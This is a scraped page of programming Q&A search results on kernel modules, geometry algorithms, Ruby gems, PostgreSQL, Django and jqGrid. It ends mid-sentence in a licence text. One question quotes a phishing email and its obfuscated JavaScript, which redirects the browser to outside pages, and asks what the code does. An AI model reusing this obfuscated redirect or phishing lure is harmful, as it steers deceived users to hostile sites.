Search Results

Search found 2567 results on 103 pages for 'pg pool'.

Page 67/103 | < Previous Page | 63 64 65 66 67 68 69 70 71 72 73 74  | Next Page >

  • Removing padding from structure in kernel module

    - by dexkid
    I am compiling a kernel module, containing a structure of size 34, using the standard command. make -C /lib/modules/$(KVERSION)/build M=$(PWD) modules The sizeof(some_structure) is coming as 36 instead of 34 i.e. the compiler is padding the structure. How do I remove this padding? Running make V=1 shows the gcc compiler options passed as make -I../inc -C /lib/modules/2.6.29.4-167.fc11.i686.PAE/build M=/home/vishal/20100426_eth_vishal/organised_eth/src modules make[1]: Entering directory `/usr/src/kernels/2.6.29.4-167.fc11.i686.PAE' test -e include/linux/autoconf.h -a -e include/config/auto.conf || ( \ echo; \ echo " ERROR: Kernel configuration is invalid."; \ echo " include/linux/autoconf.h or include/config/auto.conf are missing."; \ echo " Run 'make oldconfig && make prepare' on kernel src to fix it."; \ echo; \ /bin/false) mkdir -p /home/vishal/20100426_eth_vishal/organised_eth/src/.tmp_versions ; rm -f /home/vishal/20100426_eth_vishal/organised_eth/src/.tmp_versions/* make -f scripts/Makefile.build obj=/home/vishal/20100426_eth_vishal/organised_eth/src gcc -Wp,-MD,/home/vishal/20100426_eth_vishal/organised_eth/src/.eth_main.o.d -nostdinc -isystem /usr/lib/gcc/i586-redhat-linux/4.4.0/include -Iinclude -I/usr/src/kernels/2.6.29.4-167.fc11.i686.PAE/arch/x86/include -include include/linux/autoconf.h -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -m32 -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2 -march=i686 -mtune=generic -Wa,-mtune=generic32 -ffreestanding -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -Iarch/x86/include/asm/mach-generic -Iarch/x86/include/asm/mach-default -Wframe-larger-than=1024 -fno-stack-protector -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -pg -Wdeclaration-after-statement -Wno-pointer-sign -fwrapv -fno-dwarf2-cfi-asm -DTX_DESCRIPTOR_IN_SYSTEM_MEMORY -DRX_DESCRIPTOR_IN_SYSTEM_MEMORY -DTX_BUFFER_IN_SYSTEM_MEMORY -DRX_BUFFER_IN_SYSTEM_MEMORY -DALTERNATE_DESCRIPTORS -DEXT_8_BYTE_DESCRIPTOR -O0 -Wall -DT_ETH_1588_051 -DALTERNATE_DESCRIPTORS -DEXT_8_BYTE_DESCRIPTOR -DNETHERNET_INTERRUPTS -DETH_IEEE1588_TESTS -DSNAPTYPSEL_TMSTRENA_TEVENTENA_TESTS -DT_ETH_1588_140_147 -DLOW_DEBUG_PRINTS -DMEDIUM_DEBUG_PRINTS -DHIGH_DEBUG_PRINTS -DMODULE -D"KBUILD_STR(s)=#s" -D"KBUILD_BASENAME=KBUILD_STR(eth_main)" -D"KBUILD_MODNAME=KBUILD_STR(conxt_eth)" -c -o /home/vishal/20100426_eth_vishal/organised_eth/src/eth_main.o /home/vishal/20100426_eth_vishal/organised_eth/src/eth_main.c

    Read the article

  • An implementation of Sharir's or Aurenhammer's deterministic algorithm for calculating the intersect

    - by RGrey
    The problem of finding the intersection/union of 'N' discs/circles on a flat plane was first proposed by M. I. Shamos in his 1978 thesis: Shamos, M. I. “Computational Geometry” Ph.D. thesis, Yale Univ., New Haven, CT 1978. Since then, in 1985, Micha Sharir presented an O(n log2n) time and O(n) space deterministic algorithm for the disc intersection/union problem (based on modified Voronoi diagrams): Sharir, M. Intersection and closest-pair problems for a set of planar discs. SIAM .J Comput. 14 (1985), pp. 448-468. In 1988, Franz Aurenhammer presented a more efficient O(n log n) time and O(n) space algorithm for circle intersection/union using power diagrams (generalizations of Voronoi diagrams): Aurenhammer, F. Improved algorithms for discs and balls using power diagrams. Journal of Algorithms 9 (1985), pp. 151-161. Earlier in 1983, Paul G. Spirakis also presented an O(n^2) time deterministic algorithm, and an O(n) probabilistic algorithm: Spirakis, P.G. Very Fast Algorithms for the Area of the Union of Many Circles. Rep. 98, Dept. Comput. Sci., Courant Institute, New York University, 1983. I've been searching for any implementations of the algorithms above, focusing on computational geometry packages, and I haven't found anything yet. As neither appear trivial to put into practice, it would be really neat if someone could point me in the right direction!

    Read the article

  • What does this Javascript do?

    - by nute
    I've just found out that a spammer is sending email from our domain name, pretending to be us, saying: Dear Customer, This e-mail was send by ourwebsite.com to notify you that we have temporanly prevented access to your account. We have reasons to beleive that your account may have been accessed by someone else. Please run attached file and Follow instructions. (C) ourwebsite.com (I changed that) The attached file is an HTML file that has the following javascript: <script type='text/javascript'>function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t<pG:</</gm,vgb<lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\<]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';</script> Another email had this: <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ... Thanks

    Read the article

  • What would cause native gem extensions on OS X to build but fail to load?

    - by goodmike
    I am having trouble with some of my rubygems, in particular those that use native extensions. I am on a MacBookPro, with Snow Leopard. I have XCode 3.2.1 installed, with gcc 4.2.1. Ruby 1.8.6, because I'm lazy and a scaredy cat and don't want to upgrade yet. Ruby is running in 32-bit mode. I built this ruby from scratch when my MBP ran OSX 10.4. When I require one of the affected gems in irb, I get a Load Error for the gem extension's bundle file. For example, here's nokogigi dissing me: > require 'rubygems' = true > require 'nokogiri' LoadError: Failed to load /usr/local/lib/ruby/gems/1.8/gems/nokogiri-1.4.1/lib/nokogiri/nokogiri.bundle This is also happening with the Postgres pg and MongoDB mongo gems. My first thought was that the extensions must not be building right. But gem install wasn't throwing any errors. So I reinstalled with the verbose flag, hoping to see some helpful warnings. I've put the output in a Pastie, and the only warning I see is a consistent one about "passing argument n of ‘foo’ with different width due to prototype." I suspect that this might be an issue from upgrading to Snow Leopard, but I'm a little surprised to experience it now, since I've updated my XCode. Could it stem from running Ruby in 1.8.6? I'm embarrassed that I don't know quite enough about my Mac and OSX to know where to look next, so any guidance, even just a pointer to some document I couldn't find via Google, would be most welcome. Michael

    Read the article

  • Delphi, PGDac vs Zeos, Fetch, Lookup?

    - by durumdara
    Hi! I used Zeos to test to know: is ZTable uses fetch technics, or not? May in the future we migrate our lesser system to PGSQL, and this used now "Table" components (as BDE, but it have an SQL-like server). These tables use real cursors, a "Window" with N record, so lookup is very fast, because the Locate/Lookup is started on server, and only these N records are refreshed, no matter, how many records in the lookup table. PGSQL uses fetch technics as I know, and I tested it with a table (id int, name varchar(100)), and 1 million records. (I also trying this with mysql). The adapter is Zeos. ID, sec to find, allocated memory in bytes on client. MySQL 500000 2,761 113 196 344 1000000 3,214 225 471 232 313800 0,437 225 471 232 328066 0,468 225 471 232 276374 0,390 225 471 232 905984 1,264 225 471 232 260253 0,359 225 471 232 PGSQL 500000 3,042 113 188 184 1000000 3,744 225 463 064 313800 0,436 225 463 064 328066 0,452 225 463 064 276374 0,375 225 463 064 905984 1,295 225 463 064 260253 0,359 225 463 064 142023 0,203 225 463 064 As you see the records are fetched locally, this cause the 225 MB usage, and searches are slow a little, based where is the record we must find. I want to ask more things: a.) Is PGDAC have some technics to we can use the lookups without pay the fetch with memory and secs? b.) Or is PG ODBC driver can help in this problem with ADO? (As I know ADO can use server side cursors)? c.) Have anybody some experience with lookup tables, and performance? Is this critical question or it is not? (With client memory usage too). d.) If no chance to avoid fetch hell with lookups, what we can do? Server Side Joins, and unique code for Lookup field changing without real Lookup? Thanks for your help: dd

    Read the article

  • How to download .txt file from a url?

    - by Colin Roe
    I produced a text file and is saved to a location in the project folder. How do I redirect them to the url that contains that text file, so they can download the text file. CreateCSVFile creates the csv file to a file path based on a datatable. Calling: string pth = ("C:\\Work\\PG\\AI Handheld Website\\AI Handheld Website\\Reports\\Files\\report.txt"); CreateCSVFile(data, pth); And the function: public void CreateCSVFile(DataTable dt, string strFilePath) { StreamWriter sw = new StreamWriter(strFilePath, false); int iColCount = dt.Columns.Count; for (int i = 0; i < iColCount; i++) { sw.Write(dt.Columns[i]); if (i < iColCount - 1) { sw.Write(","); } } sw.Write(sw.NewLine); // Now write all the rows. foreach (DataRow dr in dt.Rows) { for (int i = 0; i < iColCount; i++) { if (!Convert.IsDBNull(dr[i])) { sw.Write(dr[i].ToString()); } if (i < iColCount - 1) { sw.Write(","); } } sw.Write(sw.NewLine); } sw.Close(); Response.WriteFile(strFilePath); FileInfo fileInfo = new FileInfo(strFilePath); if (fileInfo.Exists) { //Response.Clear(); //Response.AddHeader("Content-Disposition", "attachment; filename=" + fileInfo.Name); //Response.AddHeader("Content-Length", fileInfo.Length.ToString()); //Response.ContentType = "application/octet-stream"; //Response.Flush(); //Response.TransmitFile(fileInfo.FullName); } }

    Read the article

  • PostgreSQL, Foreign Keys, Insert speed & Django

    - by Miles
    A few days ago, I ran into an unexpected performance problem with a pretty standard Django setup. For an upcoming feature, we have to regenerate a table hourly, containing about 100k rows of data, 9M on the disk, 10M indexes according to pgAdmin. The problem is that inserting them by whatever method literally takes ages, up to 3 minutes of 100% disk busy time. That's not something you want on a production site. It doesn't matter if the inserts were in a transaction, issued via plain insert, multi-row insert, COPY FROM or even INSERT INTO t1 SELECT * FROM t2. After noticing this isn't Django's fault, I followed a trial and error route, and hey, the problem disappeared after dropping all foreign keys! Instead of 3 minutes, the INSERT INTO SELECT FROM took less than a second to execute, which isn't too surprising for a table <= 20M on the disk. What is weird is that PostgreSQL manages to slow down inserts by 180x just by using 3 foreign keys. Oh, disk activity was pure writing, as everything is cached in RAM; only writes go to the disks. It looks like PostgreSQL is working very hard to touch every row in the referred tables, as 3MB/sec * 180s is way more data than the 20MB this new table takes on disk. No WAL for the 180s case, I was testing in psql directly, in Django, add ~50% overhead for WAL logging. Tried @commit_on_success, same slowness, I had even implemented multi row insert and COPY FROM with psycopg2. That's another weird thing, how can 10M worth of inserts generate 10x 16M log segments? Table layout: id serial primary, a bunch of int32, 3 foreign keys to small table, 198 rows, 16k on disk large table, 1.2M rows, 59 data + 89 index MB on disk large table, 2.2M rows, 198 + 210MB So, am I doomed to either drop the foreign keys manually or use the table in a very un-Django way by defining saving bla_id x3 and skip using models.ForeignKey? I'd love to hear about some magical antidote / pg setting to fix this.

    Read the article

  • postgres - ERROR: operator does not exist

    - by cino21122
    Again, I have a function that works fine locally, but moving it online yields a big fat error... Taking a cue from a response in which someone had pointed out the number of arguments I was passing wasn't accurate, I double-checked in this situation to be certain that I am passing 5 arguments to the function itself... Query failed: ERROR: operator does not exist: point <@> point HINT: No operator matches the given name and argument type(s). You may need to add explicit type casts. The query is this: BEGIN; SELECT zip_proximity_sum('zc', (SELECT g.lat FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1), (SELECT g.lon FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1), (SELECT m.zip FROM geocoded g LEFT JOIN masterfile m ON g.recordid = m.id WHERE m.zip = '10050' ORDER BY m.id LIMIT 1) ,10); The PG function is this: CREATE OR REPLACE FUNCTION zip_proximity_sum(refcursor, numeric, numeric, character, numeric) RETURNS refcursor AS $BODY$ BEGIN OPEN $1 FOR SELECT r.zip, point($2,$3) <@> point(g.lat, g.lon) AS distance FROM geocoded g LEFT JOIN masterfile r ON g.recordid = r.id WHERE (geo_distance( point($2,$3),point(g.lat,g.lon)) < $5) ORDER BY r.zip, distance; RETURN $1; END; $BODY$ LANGUAGE 'plpgsql' VOLATILE COST 100;

    Read the article

  • postgresql help with php loop....

    - by KnockKnockWhosThere
    I keep getting an "Notice: Undefined index: did" error with this query, and I'm not understanding why... I'm much more used to mysql, so, maybe the syntax is wrong? This is the php query code: function get_demos() { global $session; $demo = array(); $result = pg_query("SELECT DISTINCT(did,vid,iid,value) FROM dv"); if(pg_num_rows($result) > 0) { while($r = pg_fetch_array($result)) { switch($r['did']) { case 1: $demo['a'][$r['vid']] = $r['value']; break; case 2: $demo['b'][$r['vid']] = $r['value']; break; case 3: $demo['c'][$r['vid']] = $r['value']; break; } } } else { $session->session_setMessage(2); } return $demo; } When I run that query at the pg prompt, I get results: "(1,1,1,"A")" "(1,2,2,"B")" "(1,3,3,"C")" "(1,4,4,"D")" "(1,5,5,"E")" "(1,6,6,"F")" "(1,7,7,"G")" "(1,8,8,"H")" "(1,9,9,"I")" "(1,10,A,"J")" "(1,11,B,"K")" "(1,12,C,"L")" "(1,13,D,"M")" "(2,14,1,"A")" "(2,15,2,"B")" "(2,16,0,"C")" "(3,17,1,"A")" "(3,18,2,"B")" "(3,19,3,"C")" "(3,20,4,"D")" "(3,21,5,"E")" "(3,22,6,"F")" "(3,23,7,"G")"

    Read the article

  • select option clears when page loads in php

    - by user79685
    Hey guys, the scenario is this: see select below <form name="limit"> <select name="limiter" onChange="limit(this.value)"> <option selected="selected">&nbsp;</option> <option value="5">5</option> <option value="10">10</option> <option value="15">15</option> </select> </form> I want whenever any option is selected for 3 things to happen: 1.) js limit() function is called which all it does its takes current url, adds new query parameter 'limit' with the user selected value eg: http://localhost/blahblah/apps/category.php?pg=1&catId=3021&limit=5 (this will cause the category.php page to be hit and # of product displayed limited to the value selected by user) 2.)Once the url is hit, it reloads but i DONT want the value selected to reset back to the default (which it currently does). I want it to reflect the users selection after page reload. 3.) Also, when i move to the next page (pagination), i would like the state to be carried ova to the next page (ie. remembering the user selection).

    Read the article

  • Can't get rails app to start on heroku

    - by jonnii
    I'm trying to deploy a rails app to heroku, but keep getting the following error. I'd have thought that managing the postgres gems would be something heroku would handle. I've tried everything I can think of short of installing postgres on my local machine, which I'd need to do if I wanted to install the postgres gem. There's also no gem called activerecord-postgresql-adapter... I'm guessing this is the standard adapter that comes with rails?? Any thoughts on how to fix this? App failed to start /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:76:in `establish_connection': Please install the postgresql adapter: `gem install activerecord-postgresql-adapter` (no such file to load -- pg) (RuntimeError) from /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:60:in `establish_connection' from /usr/local/lib/ruby/gems/1.8/gems/activerecord-2.3.5/lib/active_record/connection_adapters/abstract/connection_specification.rb:55:in `establish_connection' from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:438:in `initialize_database' from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:141:in `process' from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:113:in `send' from /usr/local/lib/ruby/gems/1.8/gems/rails-2.3.5/lib/initializer.rb:113:in `run' from /disk1/home/slugs/135415_c7f31f0_9f1f/mnt/config/environment.rb:9 from /usr/local/lib/ruby/site_ruby/1.8/rubygems/custom_require.rb:31:in `gem_original_require' ... 14 levels... from /usr/local/lib/ruby/gems/1.8/gems/rack-1.0.1/lib/rack/builder.rb:29:in `instance_eval' from /usr/local/lib/ruby/gems/1.8/gems/rack-1.0.1/lib/rack/builder.rb:29:in `initialize' from /home/heroku_rack/heroku.ru:1:in `new' from /home/heroku_rack/heroku.ru:1

    Read the article

  • Problems using (building?) native gem extensions on OS X

    - by goodmike
    I am having trouble with some of my rubygems, in particular those that use native extensions. I am on a MacBookPro, with Snow Leopard. I have XCode 3.2.1 installed, with gcc 4.2.1. Ruby 1.8.6, because I'm lazy and a scaredy cat and don't want to upgrade yet. Ruby is running in 32-bit mode. I built this ruby from scratch when my MBP ran OSX 10.4. When I require one of the affected gems in irb, I get a Load Error for the gem extension's bundle file. For example, here's nokogigi dissing me: > require 'rubygems' = true > require 'nokogiri' LoadError: Failed to load /usr/local/lib/ruby/gems/1.8/gems/nokogiri-1.4.1/lib/nokogiri/nokogiri.bundle This is also happening with the Postgres pg and MongoDB mongo gems. My first thought was that the extensions must not be building right. But gem install wasn't throwing any errors. So I reinstalled with the verbose flag, hoping to see some helpful warnings. I've put the output in a Pastie, and the only warning I see is a consistent one about "passing argument n of ‘foo’ with different width due to prototype." I suspect that this might be an issue from upgrading to Snow Leopard, but I'm a little surprised to experience it now, since I've updated my XCode. Could it stem from running Ruby in 1.8.6? I'm embarrassed that I don't know quite enough about my Mac and OSX to know where to look next, so any guidance, even just a pointer to some document I couldn't find via Google, would be most welcome. Michael

    Read the article

  • Creation of Objects: Constructors or Static Factory Methods

    - by Rachel
    I am going through Effective Java and some of my things which I consider as standard are not suggested by the book, for instance creation of object, I was under the impression that constructors are the best way of doing it and books says we should make use of static factory methods, I am not able to few some advantages and so disadvantages and so am asking this question, here are the benefits of using it. Advantages: One advantage of static factory methods is that, unlike constructors, they have names. A second advantage of static factory methods is that, unlike constructors, they are not required to create a new object each time they’re invoked. A third advantage of static factory methods is that, unlike constructors, they can return an object of any subtype of their return type. A fourth advantage of static factory methods is that they reduce the verbosity of creating parameterized type instances. I am not able to understand this advantage and would appreciate if someone can explain this point Disadvantages: The main disadvantage of providing only static factory methods is that classes without public or protected constructors cannot be subclassed. A second disadvantage of static factory methods is that they are not readily distinguishable from other static methods.I am not getting this point and so would really appreciate some explanation. Reference: Effective Java, Joshua Bloch, Edition 2, pg: 5-10 Also, How to decide to use whether to go for Constructor or Static Factory Method for Object Creation ?

    Read the article

  • How to disable the button based on Grid rows count using jquery

    - by kumar
    Hello friends, I have a button on the view.. I need to make disable based row count in the jquery grid.. that is if Rows are comming lessthen 100 I need to make Disable that button? any idea about this? here is my code.. <script type="text/javascript"> $(document).ready(function() { var RegisterGridEvents = function(excGrid) { //Register column chooser $(excGrid).jqGrid('navButtonAdd', excGrid + '_pager', { caption: "Columns", title: "Reorder Columns", onClickButton: function() { $(excGrid).jqGrid('columnChooser'); } }); $(".ui-pg-selbox").hide(); $('.ui-jqgrid-htable th:first').prepend('Select All').attr('style', 'font-size:7px'); //Register grid resize $(excGrid).jqGrid('gridResize', { minWidth: 350, maxWidth: 1500, minHeight: 400, maxHeight: 12000 }); }; $('#specialist-tab').tabs("option", "disabled", [2, 3, 4]); $('.button').button(); RegisterButtonEvents(); RegisterGridEvents("#ExceptionsGrid") }); **var a = $("#ExceptionsGrid").jqGrid('getGridParam', 'records').toString(); alert(a);** </script> is this right where I am doing this? thanks

    Read the article

  • Calculating and saving space in Postgresql

    - by punkish
    I have a table in Pg like so CREATE TABLE t ( a BIGSERIAL NOT NULL, -- 8 b b SMALLINT, -- 2 b c SMALLINT, -- 2 b d REAL, -- 4 b e REAL, -- 4 b f REAL, -- 4 b g INTEGER, -- 4 b h REAL, -- 4 b i REAL, -- 4 b j SMALLINT, -- 2 b k INTEGER, -- 4 b l INTEGER, -- 4 b m REAL, -- 4 b CONSTRAINT a_pkey PRIMARY KEY (a) ) The above adds up to 50 bytes per row. My experience is that I need another 40% to 50% for system overhead, without even any user-created indexes to the above. So, about 75 bytes per row. I will have many, many rows in the table, potentially upward of 145 billion rows, so the table is going to be pushing 13-14 Terabytes. What tricks, if any, could I use to compact this table? My possible ideas below -- Convert the REAL values to INTEGERs. If they can stored as SMALLINT, that is a saving of 2 bytes per field. Convert the columns b .. m into an array. I don't need to search on those columns, but I do need to be able to return one column's value at a time. So, if I need column g, I could do something like SELECT a, arr[5] FROM t; Would I save space with the array option? Would there be a speed penalty? Any other ideas?

    Read the article

  • PostgreSQL: return select count(*) from old_ids;

    - by Alexander Farber
    Hello, please help me with 1 more PL/pgSQL question. I have a PHP-script run as daily cronjob and deleting old records from 1 main table and few further tables referencing its "id" column: create or replace function quincytrack_clean() returns integer as $BODY$ begin create temp table old_ids (id varchar(20)) on commit drop; insert into old_ids select id from quincytrack where age(QDATETIME) > interval '30 days'; delete from hide_id where id in (select id from old_ids); delete from related_mks where id in (select id from old_ids); delete from related_cl where id in (select id from old_ids); delete from related_comment where id in (select id from old_ids); delete from quincytrack where id in (select id from old_ids); return select count(*) from old_ids; end; $BODY$ language plpgsql; And here is how I call it from the PHP script: $sth = $pg->prepare('select quincytrack_clean()'); $sth->execute(); if ($row = $sth->fetch(PDO::FETCH_ASSOC)) printf("removed %u old rows\n", $row['count']); Why do I get the following error? SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "select" at character 9 QUERY: SELECT select count(*) from old_ids CONTEXT: SQL statement in PL/PgSQL function "quincytrack_clean" near line 23 Thank you! Alex

    Read the article

  • How can i implemente LoadComplete Funtion in Jquery

    - by kumar
    I need to do the popup message for the grid.. after the grid as been load? this is the code I am using to load the grid.. <script type="text/javascript"> $(document).ready(function() { var RegisterGridEvents = function(excGrid) { //Register column chooser $(excGrid).jqGrid('navButtonAdd', excGrid + '_pager', { caption: "Columns", title: "Reorder Columns", onClickButton: function() { $(excGrid).jqGrid('columnChooser'); } }); $(".ui-pg-selbox").hide(); $('.ui-jqgrid-htable th:first').prepend('Select All').attr('style', 'font-size:7px'); //Register grid resize $(excGrid).jqGrid('gridResize', { minWidth: 350, maxWidth: 1500, minHeight: 400, maxHeight: 12000 }); }; $('#specialist-tab').tabs("option", "disabled", [2, 3, 4]); $('.button').button(); RegisterButtonEvents(); RegisterGridEvents("#ExceptionsGrid") }); </script> can anybody help me out where do i need write the pop messge to dispaly after the grid has been load.. do I need to use LoadComplete or getComplete for jquery grid to do this? if so where do I need to keep that piece of functinality in this? thanks

    Read the article

  • Boost::Thread linking error on OSX?

    - by gct
    So I'm going nuts trying to figure this one out. Here's my basic setup: I'm compiling a shared library with a bunch of core functionality that uses a lot of boost stuff. We'll call this library libpf_core.so. It's linked with the boost static libraries, specifically the python, system, filesystem, thread, and program_options libraries. This all goes swimmingly. Now, I have a little test program called test_socketio which is compiled into a shared library (it's loaded as a plugin at runtime). It uses some boost stuff like boost::bind and boost::thread, and it's linked again libpf_core.so (which has the boost libraries included remember). When I go to compile test_socketio though, out of all my plugins it gives me a linking error: [ Building test_socketio ] g++ -c -pg -g -O0 -I/usr/local/include -I../include test_socketio.cc -o test_socketio.o g++ -shared test_socketio.o -lpy_core -o test_socketio.so Undefined symbols: "boost::lock_error::lock_error()", referenced from: boost::unique_lock<boost::mutex>::lock() in test_socketio.o ld: symbol(s) not found collect2: ld returned 1 exit status And I'm going crazy trying to figure out why this is. I've tried explicitly linking boost::thread into the plugin to no avail, tried ensuring that I'm using the boost headers associated with the libraries linked into libpf_core.so in case there was a conflict there. Is there something OSX specific regarding boost that I'm missing? In my searching on google I've seen a number of other people get this error but no one seems to have come up with a satisfactory solution.

    Read the article

  • ActiveModel::MassAssignmentSecurity::Error in CustomersController#create (attr_accessible is set)

    - by megabga
    In my controller, I've got error when create action and try create model [can't mass-assignment], but in my spec, my test of mass-assignment model its pass!?! My Model: class Customer < ActiveRecord::Base attr_accessible :doc, :doc_rg, :name, :birthday, :name_sec, :address, :state_id, :city_id, :district_id, :customer_pj, :is_customer, :segment_id, :activity_id, :person_type, :person_id belongs_to :person , :polymorphic => true, dependent: :destroy has_many :histories has_many :emails def self.search(search) if search conditions = [] conditions << ['name LIKE ?', "%#{search}%"] find(:all, :conditions => conditions) else find(:all) end end end I`ve tired set attr_accessible in controller too, in my randomized way. the Controller: class CustomersController < ApplicationController include ActiveModel::MassAssignmentSecurity attr_accessible :doc, :doc_rg, :name, :birthday, :name_sec, :address, :state_id, :city_id, :district_id, :customer_pj, :is_customer autocomplete :business_segment, :name, :full => true autocomplete :business_activity, :name, :full => true [...] end The test, my passed test describe "accessible attributes" do it "should allow access to basics fields" do expect do @customer.save end.should_not raise_error(ActiveModel::MassAssignmentSecurity::Error) end end The error: ActiveModel::MassAssignmentSecurity::Error in CustomersController#create Can't mass-assign protected attributes: doc, doc_rg, name_sec, address, state_id, city_id, district_id, customer_pj, is_customer https://github.com/megabga/crm 1.9.2p320 Rails 3.2 MacOS pg

    Read the article

  • Heroku DJango app development on Windows

    - by Cliff
    I'm trying to start a Django app on Heroku using Windows and I'm getting stuck on the following error when I try to pip install psycopg2: Downloading/unpacking psycopg2 Downloading psycopg2-2.4.5.tar.gz (719Kb): 719Kb downloaded Running setup.py egg_info for package psycopg2 Error: pg_config executable not found. Please add the directory containing pg_config to the PATH or specify the full executable path with the option: python setup.py build_ext --pg-config /path/to/pg_config build ... or with the pg_config option in 'setup.cfg'. Complete output from command python setup.py egg_info: running egg_info creating pip-egg-info\psycopg2.egg-info writing pip-egg-info\psycopg2.egg-info\PKG-INFO writing top-level names to pip-egg-info\psycopg2.egg-info\top_level.txt writing dependency_links to pip-egg-info\psycopg2.egg-info\dependency_links.txt writing manifest file 'pip-egg-info\psycopg2.egg-info\SOURCES.txt' warning: manifest_maker: standard file '-c' not found I've googled the error and it seems you need libpq-dev python-dev as dependencies for postgres under Python. I also turned up a link that says you gt into trouble if you don't have the postgres bin folder in your Path so I installed Postgres manually and tried again. This time I get: error: Unable to find vcvarsall.bat I am still a python N00b so I am lost. Could someone point me in a general direction?

    Read the article

  • Syntax errors on Heroku, but not on local server (postgresql related?)

    - by Phil_Ken_Sebben
    I'm trying to deploy my first app on Heroku (rails 3). It works fine on my local server, but when I pushed it to Heroku and ran it, it crashes, giving a number of syntax errors. These are related to a collection of scopes I use like the one below: scope :scored, lambda { |score = nil| score.nil? ? {} : where('products.votes_count >= ?', score) } it produces errors of this form: "syntax error, unexpected '=', expecting '|' " "syntax error, unexpected '}', expecting kEND" Why is this syntax making Heroku choke and how can I correct it? Thanks! EDIT: I was using sqlite on my local machine and Heroku does not support that. Trying to make sure the db is properly configured for PG. I believe I have done that by specifying in the gemfile that sqlite only be used in development. Yet I still get these syntax errors, that interrupt even the db:migrate. EDIT: So now it seems more likely that my scope syntax doesn't work in postgreSQL. Does anyone know how to convert this properly?

    Read the article

  • Problems extracting information from RSS feed description field

    - by Graeme
    Hi, I've built an iPhone application using the parsing code from the TopSongs sample iPhone application. I've hit a problem though - the feed I'm trying to parse data from doesn't have a separate field for every piece of information (i.e. if it was for a feed about dogs, all the information such as dog type, dog age and dog price is contained in the feed. However, the TopSongs app relies on information having its own tags, so instead of using it uses and . So my question is this. How do I extract this information from the description field so that it can be parsed using the TopSongs parser? Can you somehow extract the dog age, price and type information using Yahoo Pipes and use that RSS feed for the feed? Or is there code that I can add to do it in application? Update: To view the code of my application parser (based on the TopSongs Core Data Apple provided application, see below. Here's a sample of one item from the the actual RSS feed I'm using (the description is longer, and has status,size, and a couple of other fields, but they're all formatted the same.: <item> <title>MOE, MARGRET STREET</title> <description> <b>District/Region:</b>&nbsp;REGION 09</br><b>Location:</b>&nbsp;MOE</br><b>Name:</b>&nbsp;MARGRET STREET</br></description> <pubDate>Thu,11 Mar 2010 05:43:03 GMT</pubDate> <guid>1266148</guid> </item> /* File: iTunesRSSImporter.m Abstract: Downloads, parses, and imports the iTunes top songs RSS feed into Core Data. Version: 1.1 Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple Inc. ("Apple") in consideration of your agreement to the following terms, and your use, installation, modification or redistribution of this Apple software constitutes acceptance of these terms. If you do not agree with these terms, please do not use, install, modify or redistribute this Apple software. In consideration of your agreement to abide by the following terms, and subject to these terms, Apple grants you a personal, non-exclusive license, under Apple's copyrights in this original Apple software (the "Apple Software"), to use, reproduce, modify and redistribute the Apple Software, with or without modifications, in source and/or binary forms; provided that if you redistribute the Apple Software in its entirety and without modifications, you must retain this notice and the following text and disclaimers in all such redistributions of the Apple Software. Neither the name, trademarks, service marks or logos of Apple Inc. may be used to endorse or promote products derived from the Apple Software without specific prior written permission from Apple. Except as expressly stated in this notice, no other rights or licenses, express or implied, are granted by Apple herein, including but not limited to any patent rights that may be infringed by your derivative works or by other works in which the Apple Software may be incorporated. The Apple Software is provided by Apple on an "AS IS" basis. APPLE MAKES NO WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND OPERATION ALONE OR IN COMBINATION WITH YOUR PRODUCTS. IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, 